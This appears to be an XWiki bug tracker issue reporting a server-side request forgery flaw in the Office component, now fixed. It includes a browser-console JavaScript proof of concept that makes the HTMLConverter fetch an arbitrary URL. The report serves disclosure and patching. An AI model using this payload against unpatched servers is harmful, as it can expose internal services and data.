Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Solved By
Priority: Blocker
Fix Version/s: 15.0-rc-1, 13.10.11, 14.4.8, 14.10.2
Affects Version/s: 14.10
Component/s: Office
Labels:

Difficulty:
Unknown
Documentation:
N/A
Documentation in Release Notes:
N/A
Similar issues:

Description

Steps to reproduce:

Make sure the office server is running.
As guest (or any user with view right) go to the main page of the wiki.

Run

(function (text) {
  const url = new URL(document.location);
  url.searchParams.append('sheet', 'CKEditor.HTMLConverter');
  url.searchParams.append('formToken', document.documentElement.dataset.xwikiFormToken);
  url.searchParams.append('toHTML', 'true');
  url.searchParams.append('text', text);
 document.location = url;
})('{{office reference="url:https://example.com/index.html"/}}');

in the browsers console.

Expected result:

An error is displayed.

Actual result:

The content of https://example.com/index.html is displayed without styling. This demonstrates server side request forgery that can be used to expose data from internal services that are only accessible from the host. There seem to be limits what contents are displayed, in particular the URL seems to need an ending that resembles a file but apart from that it also seems to display different errors depending on if the URL returns an error or not.

This can be exploited in any wiki page, in comments or also via the HTMLConverter as demonstrated above.

Attachments

Issue Links

is related to

XWIKI-20447 Office document viewer macro allows anyone to see any file from host

Closed

Activity

People

Assignee:: Simon Urli

Reporter:: Michael Hamann

Votes:: 0 Vote for this issue

Watchers:: 2 Start watching this issue

Dates

Created:: 06/Dec/22 15:34

Updated:: 16/Jun/23 17:30

Resolved:: 12/Dec/22 17:12

Date of First Response:: 12/Dec/22 5:12 PM